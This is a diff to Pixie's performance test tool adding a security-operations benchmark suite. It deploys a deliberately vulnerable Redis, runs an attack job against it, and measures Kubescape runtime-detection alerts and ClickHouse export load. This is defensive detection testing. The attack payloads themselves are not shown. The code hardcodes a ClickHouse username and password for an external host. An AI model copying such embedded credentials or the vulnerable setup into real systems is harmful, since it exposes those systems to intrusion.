redis-alt-port + namespace: redis + labels: + app.kubernetes.io/name: redis + app.kubernetes.io/component: endpoint-test +spec: + type: ClusterIP + selector: + app.kubernetes.io/name: redis + ports: + - port: 16379 + targetPort: 6379 + protocol: TCP + name: redis-alt +--- +# Redis client pod — a separate workload that connects to Redis over the network. +# Attacks from this pod simulate a compromised application in the cluster: +# - Network traffic is real pod-to-pod (not port-forward from outside) +# - Node-agent sees the TCP connection in its eBPF hooks +# - Endpoint detection can verify port-based allowlisting +apiVersion: apps/v1 +kind: Deployment +metadata: + name: redis-client + namespace: redis + labels: + app.kubernetes.io/name: redis-client + app.kubernetes.io/component: endpoint-test +spec: + replicas: 1 + selector: + matchLabels: + app.kubernetes.io/name: redis-client + template: + metadata: + labels: + app.kubernetes.io/name: redis-client + spec: + containers: + - name: client + image: redis:7.2-alpine + command: ["sleep", "infinity"] + resources: + requests: + cpu: 50m + memory: 32Mi + limits: + cpu: 200m + memory: 64Mi diff --git a/src/e2e_test/perf_tool/pkg/suites/metrics.go b/src/e2e_test/perf_tool/pkg/suites/metrics.go index aaa7d75bbd0..f431af7d933 100644 --- a/src/e2e_test/perf_tool/pkg/suites/metrics.go +++ b/src/e2e_test/perf_tool/pkg/suites/metrics.go @@ -37,6 +37,25 @@ var heapSizeScript string //go:embed scripts/http_data_loss.pxl var httpDataLossScript string +//go:embed scripts/clickhouse_export.pxl +var clickhouseExportScript string + +//go:embed scripts/clickhouse_read.pxl +var clickhouseReadScript string + +//go:embed scripts/forensic_alerts.pxl +var forensicAlertsScript string + +// ClickHouseOperatorPromRecorderName is the canonical name used by the CLI's +// --prom_recorder_override flag to retarget the ClickHouse operator scraper at +// a different cluster (kubeconfig/kube_context). +const ClickHouseOperatorPromRecorderName = "clickhouse-operator" + +// KubescapeNodeAgentPromRecorderName is the canonical name used by the CLI's +// --prom_recorder_override flag to retarget the kubescape node-agent scraper +// at a different cluster. +const KubescapeNodeAgentPromRecorderName = "kubescape-node-agent" + // ProcessStatsMetrics adds a metric spec that collects process stats such as rss,vsize, and cpu_usage. func ProcessStatsMetrics(period time.Duration) *pb.MetricSpec { return &pb.MetricSpec{ @@ -133,6 +152,169 @@ func ProtocolLoadtestPromMetrics(scrapePeriod time.Duration) *pb.MetricSpec { } } +// ClickHouseExportLoadMetric runs the clickhouse export PxL script on a tight +// period to drive load against the ClickHouse write path, and reports the +// row count of each export as a metric. sourceTable is the Pixie events +// table the script reads from (e.g. "http_events", "redis_events"); +// destTable is the ClickHouse destination table. Their column shapes must +// be compatible or Kelvin will crash on the first CH server-side column +// mismatch (see ClickHouseExportSinkNode TODO). +func ClickHouseExportLoadMetric(period time.Duration, dsn string, sourceTable string, destTable string, window time.Duration) *pb.MetricSpec { + return &pb.MetricSpec{ + MetricType: &pb.MetricSpec_PxL{ + PxL: &pb.PxLScriptSpec{ + Script: clickhouseExportScript, + Streaming: false, + CollectionPeriod: types.DurationProto(period), + TemplateValues: map[string]string{ + "dsn": dsn, + "source_table": sourceTable, + "dest_table": destTable, + "window": window.String(), + }, + TableOutputs: map[string]*pb.PxLScriptOutputList{ + "*": { + Outputs: []*pb.PxLScriptOutputSpec{ + singleMetricOutputWithPodNodeName("row_count", "clickhouse_export_rows"), + }, + }, + }, + }, + }, + } +} + +// ClickHouseReadLoadMetric runs the clickhouse read PxL script on a tight +// period to drive load against the ClickHouse read path, and reports the +// row count of each readback as a metric. +func ClickHouseReadLoadMetric(period time.Duration, dsn string, table string, window time.Duration) *pb.MetricSpec { + return &pb.MetricSpec{ + MetricType: &pb.MetricSpec_PxL{ + PxL: &pb.PxLScriptSpec{ + Script: clickhouseReadScript, + Streaming: false, + CollectionPeriod: types.DurationProto(period), + TemplateValues: map[string]string{ + "dsn": dsn, + "table": table, + "window": window.String(), + }, + TableOutputs: map[string]*pb.PxLScriptOutputList{ + "*": { + Outputs: []*pb.PxLScriptOutputSpec{ + singleMetricOutputWithPodNodeName("row_count", "clickhouse_read_rows"), + }, + }, + }, + }, + }, + } +} + +// ClickHouseOperatorMetrics scrapes the Altinity clickhouse-operator's +// metrics-exporter sidecar (`ch-metrics` port 8888), which proxies per-shard +// ClickHouse server metrics. Named so the --prom_recorder_override CLI flag +// can point it at a different cluster via kubeconfig/kube_context. +func ClickHouseOperatorMetrics(scrapePeriod time.Duration) *pb.MetricSpec { + return &pb.MetricSpec{ + MetricType: &pb.MetricSpec_Prom{ + Prom: &pb.PrometheusScrapeSpec{ + Name: ClickHouseOperatorPromRecorderName, + Namespace: "clickhouse", + MatchLabelKey: "app.kubernetes.io/name", + MatchLabelValue: "altinity-clickhouse-operator", + Port: 8888, + ScrapePeriod: types.DurationProto(scrapePeriod), + MetricNames: map[string]string{ + // Gauges: in-flight load on CH servers. + "chi_clickhouse_metric_Query": "clickhouse_active_queries", + "chi_clickhouse_metric_TCPConnection": "clickhouse_tcp_connections", + "chi_clickhouse_metric_HTTPConnection": "clickhouse_http_connections", + "chi_clickhouse_metric_MemoryTracking": "clickhouse_memory_tracking_bytes", + "chi_clickhouse_metric_BackgroundMergesAndMutationsPoolTask": "clickhouse_background_merge_tasks", + "chi_clickhouse_metric_PartsActive": "clickhouse_parts_active", + // Counters: throughput and errors. + "chi_clickhouse_event_Query": "clickhouse_queries_total", + "chi_clickhouse_event_InsertedRows": "clickhouse_inserted_rows_total", + "chi_clickhouse_event_SelectedRows": "clickhouse_selected_rows_total", + "chi_clickhouse_event_FailedQuery": "clickhouse_failed_queries_total", + "chi_clickhouse_event_NetworkSendBytes": "clickhouse_network_send_bytes_total", + "chi_clickhouse_event_NetworkReceiveBytes": "clickhouse_network_receive_bytes_total", + // Per-table gauges: storage-side pressure. + "chi_clickhouse_table_parts_rows": "clickhouse_table_parts_rows", + "chi_clickhouse_table_parts_bytes": "clickhouse_table_parts_bytes", + }, + }, + }, + } +} + +// KubescapeNodeAgentMetrics scrapes the Kubescape node-agent DaemonSet +// (the component that runs eBPF hooks and emits runtime anomaly alerts). +// Metrics are exposed on port 8080 of pods with label `app=node-agent` in +// the `honey` namespace, matching the kubescape helm chart defaults. +// +// Named so the --prom_recorder_override CLI flag can point it at a +// different cluster via kubeconfig/kube_context. +func KubescapeNodeAgentMetrics(scrapePeriod time.Duration) *pb.MetricSpec { + return &pb.MetricSpec{ + MetricType: &pb.MetricSpec_Prom{ + Prom: &pb.PrometheusScrapeSpec{ + Name: KubescapeNodeAgentPromRecorderName, + Namespace: "honey", + MatchLabelKey: "app", + MatchLabelValue: "node-agent", + Port: 8080, + ScrapePeriod: types.DurationProto(scrapePeriod), + // Whitelist is a superset: prometheus_recorder silently drops + // metrics that are not present in the source, so listing a + // candidate name that a particular kubescape version has not + // (yet) exposed is harmless. + MetricNames: map[string]string{ + // Standard Go/process exporters — always present. + "process_cpu_seconds_total": "kubescape_node_agent_cpu_seconds_total", + "process_resident_memory_bytes": "kubescape_node_agent_rss", + "process_virtual_memory_bytes": "kubescape_node_agent_vsize", + "go_goroutines": "kubescape_node_agent_goroutines", + // Kubescape-specific (names may vary across versions). + "kubescape_ruleengine_firing_alerts_total": "kubescape_firing_alerts_total", + "kubescape_ruleengine_applied_rules_total": "kubescape_applied_rules_total", + "kubescape_node_agent_events_seen_total": "kubescape_events_seen_total", + "kubescape_node_agent_events_dropped_total": "kubescape_events_dropped_total", + }, + }, + }, + } +} + +// ForensicAlertCountMetric runs a PxL script against the forensic +// ClickHouse cluster (via clickhouse_dsn=…) to count Kubescape anomaly +// alerts that Vector has landed in forensic_db.kubescape_logs. Emits one +// row per invocation with the total count over the windowed time range. +func ForensicAlertCountMetric(period time.Duration, dsn string, table string, window time.Duration) *pb.MetricSpec { + return &pb.MetricSpec{ + MetricType: &pb.MetricSpec_PxL{ + PxL: &pb.PxLScriptSpec{ + Script: forensicAlertsScript, + Streaming: false, + CollectionPeriod: types.DurationProto(period), + TemplateValues: map[string]string{ + "dsn": dsn, + "table": table, + "window": window.String(), + }, + TableOutputs: map[string]*pb.PxLScriptOutputList{ + "*": { + Outputs: []*pb.PxLScriptOutputSpec{ + singleMetricOutputWithPodNodeName("alert_count", "forensic_alert_count"), + }, + }, + }, + }, + }, + } +} + func singleMetricOutputWithPodNodeName(col string, newName ...string) *pb.PxLScriptOutputSpec { metricName := col if len(newName) > 0 { diff --git a/src/e2e_test/perf_tool/pkg/suites/scripts/clickhouse_export.pxl b/src/e2e_test/perf_tool/pkg/suites/scripts/clickhouse_export.pxl new file mode 100644 index 00000000000..895eb45a0b9 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/scripts/clickhouse_export.pxl @@ -0,0 +1,47 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +# Exports a windowed slice of a Pixie events table to ClickHouse on every +# invocation, producing sustained load on the export path. px._pem_hostname() +# ensures the Map runs on the PEM so each row carries the correct hostname. +# +# source_table: the Pixie events table to read from (e.g. http_events, +# redis_events). dest_table: the ClickHouse destination table name. These +# must have compatible column shapes — exporting http_events rows to a +# pre-existing CH table created for redis_events will make the CH server +# reject the INSERT on the first column mismatch, and the clickhouse-cpp +# client will rethrow that as an uncaught std::exception, crashing Kelvin +# (see ClickHouseExportSinkNode TODO). + +import px + +df = px.DataFrame('{{.TemplateValues.source_table}}', start_time='-{{.TemplateValues.window}}') +df.hostname = px._pem_hostname() +px.export(df, px.otel.ClickHouseRows( + table='{{.TemplateValues.dest_table}}', + endpoint=px.otel.Endpoint( + url='{{.TemplateValues.dsn}}', + ), +)) + +# Emit one metric row per invocation so we can chart export cadence and row +# counts. The metric recorder will pick up row_count as a single metric. +metric_df = df.groupby([]).agg(row_count=('time_', px.count)) +metric_df.timestamp = px.now() +metric_df.node_name = px._exec_hostname() +metric_df.pod = 'clickhouse-export-driver' +metric_df = metric_df[['timestamp', 'node_name', 'pod', 'row_count']] +px.display(metric_df, 'export_stats') diff --git a/src/e2e_test/perf_tool/pkg/suites/scripts/clickhouse_read.pxl b/src/e2e_test/perf_tool/pkg/suites/scripts/clickhouse_read.pxl new file mode 100644 index 00000000000..8975e21e879 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/scripts/clickhouse_read.pxl @@ -0,0 +1,37 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +# Reads a windowed slice of http_events back from ClickHouse on every +# invocation, exercising the ClickHouse read path and Pixie's ClickHouse +# source plan. Emits a metric row reporting the number of rows returned so +# we can track read throughput. + +import px + +df = px.DataFrame( + '{{.TemplateValues.table}}', + clickhouse_dsn='{{.TemplateValues.dsn}}', + start_time='-{{.TemplateValues.window}}', +) + +# A light-weight aggregation ensures ClickHouse actually has to scan the +# window rather than just serving the first page of rows. +metric_df = df.groupby([]).agg(row_count=('time_', px.count)) +metric_df.timestamp = px.now() +metric_df.node_name = px._exec_hostname() +metric_df.pod = 'clickhouse-read-driver' +metric_df = metric_df[['timestamp', 'node_name', 'pod', 'row_count']] +px.display(metric_df, 'read_stats') diff --git a/src/e2e_test/perf_tool/pkg/suites/scripts/forensic_alerts.pxl b/src/e2e_test/perf_tool/pkg/suites/scripts/forensic_alerts.pxl new file mode 100644 index 00000000000..ea67958f247 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/scripts/forensic_alerts.pxl @@ -0,0 +1,40 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +# Counts Kubescape anomaly alerts that Vector has written into +# forensic_db.alerts in the forensic ClickHouse cluster, windowed on +# event_time. One metric row per rule_id per invocation so the recorder can +# tag it as a per-rule series. + +import px + +df = px.DataFrame( + '{{.TemplateValues.table}}', + clickhouse_dsn='{{.TemplateValues.dsn}}', + start_time='-{{.TemplateValues.window}}', +) + +# forensic_db.kubescape_logs has (per the demo's observe.pxl probe) +# top-level columns: message, RuntimeK8sDetails, event_time. There is no +# top-level RuleID column — the rule id lives inside the JSON `message` +# payload. We just count total alerts in the window; per-rule breakdowns +# are left to downstream analysis. +df = df.agg(alert_count=('event_time', px.count)) +df.timestamp = px.now() +df.node_name = px._exec_hostname() +df.pod = 'forensic-alert-driver' +df = df[['timestamp', 'node_name', 'pod', 'alert_count']] +px.display(df, 'forensic_alert_stats') diff --git a/src/e2e_test/perf_tool/pkg/suites/scripts/healthcheck/redis_data_in_namespace.pxl b/src/e2e_test/perf_tool/pkg/suites/scripts/healthcheck/redis_data_in_namespace.pxl new file mode 100644 index 00000000000..cdd2c39e354 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/scripts/healthcheck/redis_data_in_namespace.pxl @@ -0,0 +1,25 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +import px + +df = px.DataFrame('redis_events', start_time='-30s') +df.namespace = df.ctx['namespace'] +df = df[df.namespace == '{{.Namespace}}'] + +df = df.agg(count=('time_', px.count)) +df.success = (df.count > 0) +px.display(df[['success']]) diff --git a/src/e2e_test/perf_tool/pkg/suites/sovereign_soc.go b/src/e2e_test/perf_tool/pkg/suites/sovereign_soc.go new file mode 100644 index 00000000000..db30a7fc449 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/sovereign_soc.go @@ -0,0 +1,329 @@ +/* + * Copyright 2018- The Pixie Authors. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + * SPDX-License-Identifier: Apache-2.0 + */ + +package suites + +import ( + // Embed import is required to use go:embed directive. + _ "embed" + "fmt" + "strings" + "text/template" + "time" + + "github.com/gogo/protobuf/types" + log "github.com/sirupsen/logrus" + + pb "px.dev/pixie/src/e2e_test/perf_tool/experimentpb" +) + +// Paths are resolved relative to the pixie workspace root; run.go chdirs +// there at startup via BUILD_WORKSPACE_DIRECTORY / `git rev-parse +// --show-toplevel`, so the perf_tool binary always sees these files +// regardless of where the user invoked bazel run from. +const ( + sovereignSOCYAMLRoot = "src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc" +) + +//go:embed scripts/healthcheck/redis_data_in_namespace.pxl +var redisDataInNamespaceScript string + +// KubescapeVectorWorkload installs Kubescape (eBPF runtime-detection node +// agent + storage + operator) and Vector (DaemonSet shipping Kubescape node- +// agent logs into ClickHouse) on the experiment cluster. Manifests are +// pre-rendered from upstream Helm charts so PrerenderedDeploy can apply them +// statically — see k8s/sovereign-soc/helm-rendered/README.md for the +// re-render recipe. +// +// Treated as long-lived infrastructure (similar to the cert-manager +// prerequisite of the k8ssandra suite). All steps set +// SkipNamespaceDelete=true so teardown never tries to delete `honey` or +// `kube-system`. The first run installs; subsequent runs idempotently +// re-apply (Pixie's ApplyResources skips with IsAlreadyExists or falls +// through to Update). Manual cleanup is only required if you change the +// rendered YAML in a backwards-incompatible way. +// +// The workload is tagged with action_selector="infra" and the experiment +// schedules a START_WORKLOADS{Name:"infra"} action before +// START_METRIC_RECORDERS. That ordering is load-bearing: the kubescape +// node-agent's prometheus exporter is gated by a ConfigMap that this +// workload writes, and the perf_tool's prometheus recorder pre-flights +// port-forwards at recorder-start time. If recorders ran first, they +// would connect to an old node-agent pod with no listener on :8080 and +// the recorder would error out before the experiment even started +// measuring. +// +// Layout: +// 1. kubescape.rendered.yaml — honey namespace, main install + 5 CRDs at +// the top of the file (rendered with --include-crds so kubescape's +// `crds/` chart directory is emitted). +// 2. kubescape.rendered.kube-system.yaml — the one RoleBinding kubescape +// needs in kube-system (storage-auth-reader) for API aggregation auth. +// 3. kubescape-default-rules.yaml — the built-in runtime rule set. +// 4. vector.rendered.yaml — Vector DaemonSet + RBAC that tails Kubescape +// node-agent logs into forensic_db.kubescape_logs. Endpoint is the +// external forensic CH URL so any experiment cluster can write to it. +// SovereignSOCInfraSelector is the action_selector tagged onto the +// kubescape-vector workload so it runs in a dedicated START_WORKLOADS +// phase before START_METRIC_RECORDERS — see the docstring on +// KubescapeVectorWorkload. +const SovereignSOCInfraSelector = "infra" + +func KubescapeVectorWorkload() *pb.WorkloadSpec { + return &pb.WorkloadSpec{ + Name: "kubescape-vector", + ActionSelector: SovereignSOCInfraSelector, + DeploySteps: []*pb.DeployStep{ + { + DeployType: &pb.DeployStep_Prerendered{ + Prerendered: &pb.PrerenderedDeploy{ + YAMLPaths: []string{ + fmt.Sprintf("%s/helm-rendered/kubescape.rendered.yaml", sovereignSOCYAMLRoot), + }, + SkipNamespaceDelete: true, + }, + }, + }, + { + DeployType: &pb.DeployStep_Prerendered{ + Prerendered: &pb.PrerenderedDeploy{ + YAMLPaths: []string{ + fmt.Sprintf("%s/helm-rendered/kubescape.rendered.kube-system.yaml", sovereignSOCYAMLRoot), + }, + SkipNamespaceDelete: true, + }, + }, + }, + { + DeployType: &pb.DeployStep_Prerendered{ + Prerendered: &pb.PrerenderedDeploy{ + YAMLPaths: []string{ + fmt.Sprintf("%s/helm-rendered/kubescape-default-rules.yaml", sovereignSOCYAMLRoot), + }, + SkipNamespaceDelete: true, + }, + }, + }, + { + DeployType: &pb.DeployStep_Prerendered{ + Prerendered: &pb.PrerenderedDeploy{ + YAMLPaths: []string{ + fmt.Sprintf("%s/helm-rendered/vector.rendered.yaml", sovereignSOCYAMLRoot), + }, + SkipNamespaceDelete: true, + }, + }, + }, + }, + Healthchecks: []*pb.HealthCheck{ + { + CheckType: &pb.HealthCheck_K8S{ + K8S: &pb.K8SPodsReadyCheck{ + Namespace: "honey", + }, + }, + }, + }, + } +} + +// RedisVulnerableWorkload deploys the pre-populated Kubescape +// ApplicationProfile and the intentionally vulnerable Redis 7.2.10 used by +// the sovereign-soc suite. Both YAMLs land in the `redis` namespace. +// Assumes the target cluster has Kubescape (honey/node-agent) preinstalled +// — the k8ssandra suite has the same "external prerequisite" shape. +func RedisVulnerableWorkload() *pb.WorkloadSpec { + return &pb.WorkloadSpec{ + Name: "redis-vulnerable", + DeploySteps: []*pb.DeployStep{ + { + DeployType: &pb.DeployStep_Prerendered{ + Prerendered: &pb.PrerenderedDeploy{ + YAMLPaths: []string{ + fmt.Sprintf("%s/redis-sbob.yaml", sovereignSOCYAMLRoot), + fmt.Sprintf("%s/redis-vulnerable.yaml", sovereignSOCYAMLRoot), + }, + }, + }, + }, + }, + Healthchecks: redisHealthChecks("redis"), + } +} + +// BobctlAttackWorkload deploys a Kubernetes Job that runs `bobctl attack` +// against the vulnerable redis deployment in a tight loop for the +// experiment's duration. The Job's init container downloads the bobctl +// binary from the upstream release; the attack suite is mounted from the +// bob-suite-attack ConfigMap. +func BobctlAttackWorkload() *pb.WorkloadSpec { + return &pb.WorkloadSpec{ + Name: "bobctl-attack", + DeploySteps: []*pb.DeployStep{ + { + DeployType: &pb.DeployStep_Prerendered{ + Prerendered: &pb.PrerenderedDeploy{ + YAMLPaths: []string{ + fmt.Sprintf("%s/bob-suite-attack-cm.yaml", sovereignSOCYAMLRoot), + fmt.Sprintf("%s/bobctl-attack-job.yaml", sovereignSOCYAMLRoot), + }, + }, + }, + }, + }, + Healthchecks: []*pb.HealthCheck{ + { + CheckType: &pb.HealthCheck_K8S{ + K8S: &pb.K8SPodsReadyCheck{ + Namespace: "redis", + }, + }, + }, + }, + } +} + +// redisHealthChecks mirrors HTTPHealthChecks but asserts on Pixie's +// redis_events table instead of http_events. +func redisHealthChecks(namespace string) []*pb.HealthCheck { + checks := []*pb.HealthCheck{ + { + CheckType: &pb.HealthCheck_K8S{ + K8S: &pb.K8SPodsReadyCheck{ + Namespace: namespace, + }, + }, + }, + } + t, err := template.New("").Parse(redisDataInNamespaceScript) + if err != nil { + log.WithError(err).Fatal("failed to parse Redis healthcheck script") + } + buf := &strings.Builder{} + err = t.Execute(buf, &struct { + Namespace string + }{ + Namespace: namespace, + }) + if err != nil { + log.WithError(err).Fatal("failed to execute Redis healthcheck template") + } + checks = append(checks, &pb.HealthCheck{ + CheckType: &pb.HealthCheck_PxL{ + PxL: &pb.PxLHealthCheck{ + Script: buf.String(), + SuccessColumn: "success", + }, + }, + }) + return checks +} + +// SovereignSOCRedisAttackExperiment drives the vulnerable redis deployment +// with a continuous bobctl attack loop while Pixie is running. The +// clickhouse_export PxL script continuously exports a windowed slice of +// redis_events to the forensic ClickHouse cluster; KubescapeNodeAgent and +// ForensicAlertCount track the anomaly side, ProcessStats/Heap/CH operator +// track Pixie and CH health. +// +// exportDSN is the ClickHouse endpoint Kelvin uses for px.export; it MUST +// be reachable from the experiment cluster's network. Pointing this at an +// in-cluster service DNS name of a different cluster will crash Kelvin +// because ClickHouseExportSinkNode::OpenImpl does not catch exceptions +// thrown by the clickhouse-cpp client constructor on DNS failure. +// +// alertsDSN is the ClickHouse endpoint the perf tool reads forensic_db +// alerts from via clickhouse_dsn=. It can be a different cluster/db/user +// from exportDSN. A failure here will only error the forensic-alerts +// metric; it will not crash Kelvin. +func SovereignSOCRedisAttackExperiment( + metricPeriod time.Duration, + exportPeriod time.Duration, + exportWindow time.Duration, + exportDSN string, + exportTable string, + alertsDSN string, + alertsTable string, + alertCountWindow time.Duration, + predeployDur time.Duration, + dur time.Duration, +) *pb.ExperimentSpec { + e := &pb.ExperimentSpec{ + VizierSpec: VizierWorkload(), + WorkloadSpecs: []*pb.WorkloadSpec{ + // Kubescape + Vector first so the node-agent is running and + // Vector's log pipeline is live before any attack traffic is + // generated. Vector ships node-agent logs to + // forensic_db.kubescape_logs on the external forensic CH. + KubescapeVectorWorkload(), + RedisVulnerableWorkload(), + BobctlAttackWorkload(), + }, + MetricSpecs: []*pb.MetricSpec{ + ProcessStatsMetrics(metricPeriod), + // Stagger the heap query slightly because of known query stability issues. + HeapMetrics(metricPeriod + (2 * time.Second)), + ClickHouseExportLoadMetric(exportPeriod, exportDSN, exportTable, exportTable, exportWindow), + ClickHouseOperatorMetrics(metricPeriod), + KubescapeNodeAgentMetrics(metricPeriod), + ForensicAlertCountMetric(metricPeriod, alertsDSN, alertsTable, alertCountWindow), + }, + RunSpec: &pb.RunSpec{ + Actions: []*pb.ActionSpec{ + { + Type: pb.START_VIZIER, + }, + { + // Deploy kubescape+vector first so the node-agent's + // prometheus listener on :8080 is up before the + // metric recorder pre-flights port-forwards. Without + // this ordering, the recorder errors out at startup. + Type: pb.START_WORKLOADS, + Name: SovereignSOCInfraSelector, + }, + { + Type: pb.START_METRIC_RECORDERS, + }, + { + Type: pb.BURNIN, + Duration: types.DurationProto(predeployDur), + }, + { + // Default selector (empty) catches the redis + + // bobctl-attack workloads. + Type: pb.START_WORKLOADS, + }, + { + Type: pb.RUN, + Duration: types.DurationProto(dur), + }, + { + Type: pb.STOP_METRIC_RECORDERS, + }, + }, + }, + ClusterSpec: DefaultCluster, + } + e = addTags(e, + "workload/sovereign-soc", + "workload/redis-attack", + fmt.Sprintf("parameter/export_window/%s", exportWindow), + fmt.Sprintf("parameter/alert_count_window/%s", alertCountWindow), + ) + return e +} diff --git a/src/e2e_test/perf_tool/pkg/suites/suites.go b/src/e2e_test/perf_tool/pkg/suites/suites.go index 4d5597ddf04..f3d89618986 100644 --- a/src/e2e_test/perf_tool/pkg/suites/suites.go +++ b/src/e2e_test/perf_tool/pkg/suites/suites.go @@ -30,15 +30,17 @@ type ExperimentSuite func() map[string]*pb.ExperimentSpec // ExperimentSuiteRegistry contains all the ExperimentSuite, keyed by name. var ExperimentSuiteRegistry = map[string]ExperimentSuite{ - "nightly": nightlyExperimentSuite, - "http-grid": httpGridSuite, - "k8ssandra": k8ssandraExperimentSuite, + "nightly": nightlyExperimentSuite, + "http-grid": httpGridSuite, + "k8ssandra": k8ssandraExperimentSuite, + "clickhouse-exec": clickhouseExecSuite, + "sovereign-soc": sovereignSOCSuite, } func nightlyExperimentSuite() map[string]*pb.ExperimentSpec { defaultMetricPeriod := 30 * time.Second preDur := 5 * time.Minute - dur := 40 * time.Minute + dur := 5 * time.Minute httpNumConns := 100 exps := map[string]*pb.ExperimentSpec{ "http-loadtest/100/100": HTTPLoadTestExperiment(httpNumConns, 100, defaultMetricPeriod, preDur, dur), @@ -73,6 +75,55 @@ func k8ssandraExperimentSuite() map[string]*pb.ExperimentSpec { return exps } +// clickhouseExecSuite covers the two sides of Pixie's ClickHouse integration +// under load: the write/export path and the read/query path. Both experiments +// share the same metric shape (process/heap/clickhouse-operator) so results +// can be compared directly. +// +// The ClickHouse operator metrics are scraped via the prometheus recorder +// named "clickhouse-operator" -- point the CLI at the correct cluster with: +// +// --prom_recorder_override clickhouse-operator=/path/to/kubeconfig:my-ctx +func clickhouseExecSuite() map[string]*pb.ExperimentSpec { + defaultMetricPeriod := 30 * time.Second + preDur := 5 * time.Minute + // preDur := 2 * time.Minute + dur := 20 * time.Minute + // dur := 5 * time.Minute + httpNumConns := 100 + httpTargetRPS := 3000 + + // Tight cadence on the export/read scripts to apply real pressure. + exportPeriod := 5 * time.Second + exportWindow := 30 * time.Second + readPeriod := 5 * time.Second + readWindow := 5 * time.Minute + + clickhouseDSN := "pixie:pixie_password@clickhouse.forensic.austrianopencloudcommunity.org:9000/default" + clickhouseTable := "http_events" + + exps := map[string]*pb.ExperimentSpec{ + "clickhouse-export": ClickHouseExportExperiment( + httpNumConns, httpTargetRPS, + defaultMetricPeriod, + exportPeriod, exportWindow, + clickhouseDSN, clickhouseTable, + preDur, dur, + ), + "clickhouse-read": ClickHouseReadExperiment( + httpNumConns, httpTargetRPS, + defaultMetricPeriod, + readPeriod, readWindow, + clickhouseDSN, clickhouseTable, + preDur, dur, + ), + } + for _, e := range exps { + addTags(e, "suite/clickhouse-exec") + } + return exps +} + func httpGridSuite() map[string]*pb.ExperimentSpec { defaultMetricPeriod := 30 * time.Second preDur := 5 * time.Minute @@ -115,3 +166,59 @@ func httpGridSuite() map[string]*pb.ExperimentSpec { } return exps } + +// sovereignSOCSuite drives the Sovereign SOC demo workflow (vulnerable +// Redis 7.2.10 + bobctl attack loop + Kubescape anomaly generation + +// forensic ClickHouse export) under perf_tool orchestration. Assumes the +// target cluster already has Kubescape (honey namespace, app=node-agent +// DaemonSet), an Altinity ClickHouse operator in the `clickhouse` namespace, +// and Vector tailing kubescape logs into forensic_db.alerts — same +// pre-installed-dependency shape as the k8ssandra suite. Point prometheus +// recorders at the forensic cluster via +// +// --prom_recorder_override clickhouse-operator=: +// --prom_recorder_override kubescape-node-agent=: +func sovereignSOCSuite() map[string]*pb.ExperimentSpec { + defaultMetricPeriod := 30 * time.Second + preDur := 2 * time.Minute + dur := 20 * time.Minute + + exportPeriod := 5 * time.Second + exportWindow := 30 * time.Second + alertCountWindow := 1 * time.Minute + + // Both DSNs target the same external forensic endpoint with the same + // pixie user (which has been granted SHOW/SELECT/INSERT on forensic_db.* + // out-of-band). The endpoint MUST be reachable from the experiment + // cluster's network — the clickhouse-cpp client will crash Kelvin with + // SIGSEGV if DNS fails (see ClickHouseExportSinkNode TODO). + // - exportDSN: /default — where Pixie's CH export sink writes. + // - alertsDSN: /forensic_db — where Vector lands Kubescape alerts. + // forensic_db must be pre-created via soc/tree/clickhouse-lab/schema.sql; + // this suite does not bootstrap CH schemas (CH is shared infra). + const clickhouseHost = "clickhouse.forensic.austrianopencloudcommunity.org:9000" + const clickhouseCreds = "pixie:pixie_password" + exportDSN := fmt.Sprintf("%s@%s/default", clickhouseCreds, clickhouseHost) + alertsDSN := fmt.Sprintf("%s@%s/forensic_db", clickhouseCreds, clickhouseHost) + exportTable := "redis_events" + // Vector writes raw kubescape alerts to forensic_db.kubescape_logs (see + // helm-rendered/vector-values.yaml kubescape_clickhouse sink). A + // separate forensic_db.alerts materialized view / projection exists in + // some demo variants but is not populated by the stock Vector config. + alertsTable := "kubescape_logs" + + exps := map[string]*pb.ExperimentSpec{ + "redis-attack": SovereignSOCRedisAttackExperiment( + defaultMetricPeriod, + exportPeriod, exportWindow, + exportDSN, exportTable, + alertsDSN, alertsTable, + alertCountWindow, + preDur, dur, + ), + } + for _, e := range exps { + addTags(e, "suite/sovereign-soc") 